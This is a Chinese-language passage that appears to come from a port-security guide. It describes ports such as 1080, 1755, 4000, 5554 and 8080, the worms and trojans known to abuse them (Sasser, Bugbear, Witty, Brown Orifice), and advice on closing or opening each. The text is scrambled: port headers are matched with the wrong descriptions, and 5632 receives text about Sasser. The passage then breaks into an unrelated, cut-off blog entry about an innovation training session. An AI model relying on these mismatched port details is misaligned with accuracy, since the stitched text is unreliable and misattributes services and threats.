操作建议：一般的杀毒软件都可以方便地进行YAI病毒的查杀，所以在确认无YAI病毒的情况下建议开启该端口。

1080端口：1080端口是Socks代理服务使用的端口，大家平时上网使用的WWW服务使用的是HTTP协议的代理服务。

端口说明：1080端口是Socks代理服务使用的端口，大家平时上网使用的WWW服务使用的是HTTP协议的代理服务。而Socks代理服务不同于 HTTP代理服务，它是以通道方式穿越防火墙，可以让防火墙后面的用户通过一个IP地址访问Internet。Socks代理服务经常被使用在局域网中， 比如限制了QQ，那么就可以打开QQ参数设置窗口，选择“网络设置”，在其中设置Socks代理服务。另外，还可以通过安装Socks代理软件来使用 QQ，比如Socks2HTTP、SocksCap32等。

端口漏洞：著名的代理服务器软件WinGate默认的端口就是1080，通过该端口来实现局域网内计算机的共享上网。不过，如 Worm.Bugbear.B（怪物II）、Worm.Novarg.B（SCO炸弹变种B）等蠕虫病毒也会在本地系统监听1080端口，给计算机的安全 带来不利。

操作建议：除了经常使用WinGate来共享上网外，那么其他的建议关闭该端口。
1755端口：1755端口默认情况下用于“Microsoft Media Server”（微软媒体服务器，简称MMS）。

4000端口：4000端口是用于大家经常使用的QQ聊天工具的，再细说就是为QQ客户端开放的端口，QQ服务端使用的端口是8000。

　

端口说明：1755端口默认情况下用于“Microsoft Media Server”（微软媒体服务器，简称MMS），该协议是由微软发布的流媒体协议，通过MMS协议可以在Internet上实现Windows Media服务器中流媒体文件的传送与播放。这些文件包括.asf、.wmv等，可以使用Windows Media Player等媒体播放软件来实时播放。其中，具体来讲，1755端口又可以分为TCP和UDP的MMS协议，分别是MMST和MMSU，一般采用TCP 的MMS协议，即MMST。目前，流媒体和普通下载软件大部分都支持MMS协议。

端口漏洞：目前从微软官方和用户使用MMS协议传输、播放流媒体文件来看，并没有什么特别明显的漏洞，主要一个就是MMS协议与防火墙和NAT（网络地址转换）之间存在的兼容性问题。

操作建议：为了能实时播放、下载到MMS协议的流媒体文件，建议开启该端口。

5554端口：在今年4月30日就报道出现了一种针对微软lsass服务的新蠕虫病毒——震荡波（Worm.Sasser），该病毒可以利用TCP 5554端口开启一个FTP服务，主要被用于病毒的传播。

端口说明：4000端口是用于大家经常使用的QQ聊天工具的，再细说就是为QQ客户端开放的端口，QQ服务端使用的端口是8000。通过4000端口， QQ客户端程序可以向QQ服务器发送信息，实现身份验证、消息转发等，QQ用户之间发送的消息默认情况下都是通过该端口传输的。4000和8000端口都 不属于TCP协议，而是属于UDP协议。

端口漏洞：因为4000端口属于UDP端口，虽然可以直接传送消息，但是也存在着各种漏洞，比如Worm_Witty.A（维迪）蠕虫病毒就是利用 4000端口向随机IP发送病毒，并且伪装成ICQ数据包，造成的后果就是向硬盘中写入随机数据。另外，Trojan.SkyDance特洛伊木马病毒也 是利用该端口的。

操作建议：为了用QQ聊天，4000大门敞开也无妨。

5632端口：5632端口是被大家所熟悉的远程控制软件pcAnywhere所开启的端口。

端口说明：在今年4月30日就报道出现了一种针对微软lsass服务的新蠕虫病毒——震荡波（Worm.Sasser），该病毒可以利用TCP 5554端口开启一个FTP服务，主要被用于病毒的传播。

端口漏洞：在感染“震荡波”病毒后会通过5554端口向其他感染的计算机传送蠕虫病毒，并尝试连接TCP 445端口并发送攻击，中毒的计算机会出现系统反复重启、运行缓慢、无法正常上网等现象，甚至会被黑客利用夺取系统的控制权限。

操作建议：为了防止感染“震荡波”病毒，建议关闭5554端口。

8080端口：8080端口同80端口，是被用于WWW代理服务的，可以实现网页浏览。

端口说明：8080端口同80端口，是被用于WWW代理服务的，可以实现网页浏览，经常在访问某个网站或使用代理服务器的时候，会加上“:8080”端口号，比如http://www.cce.com.cn:8080。

端口漏洞：8080端口可以被各种病毒程序所利用，比如Brown Orifice（BrO）特洛伊木马病毒可以利用8080端口完全遥控被感染的计算机。另外，RemoConChubo，RingZero木马也可以利用该端口进行攻击。

今天下午参加了研发部的研发创新培训，由于是下午1点钟开始的，坐下来就开始发困，但是还是有两句话给我留下了比较深刻的印象。

一是周辉老师说的：创新分为5种模式——基础研究、应用研究、产品创新、解决方案、服务创新（大概意思），象我们这样的企业的创新应该着眼于后四种，即应用、产品化、解决方案和服务，而基础研究应该是政府科研单位、学校科研组织做的事。必要的时候我们宁愿采用合作的方式，也不要自己进行基础研究。

二是Jane说的：创新的含义是——善于利用已有的基础研究成果，结合实际的用户需求，创造出最符合用户需求的产品。真正的创新应该造福社会（即解决用户的实际问题），同时成就公司。

个人感觉这Jane的话说得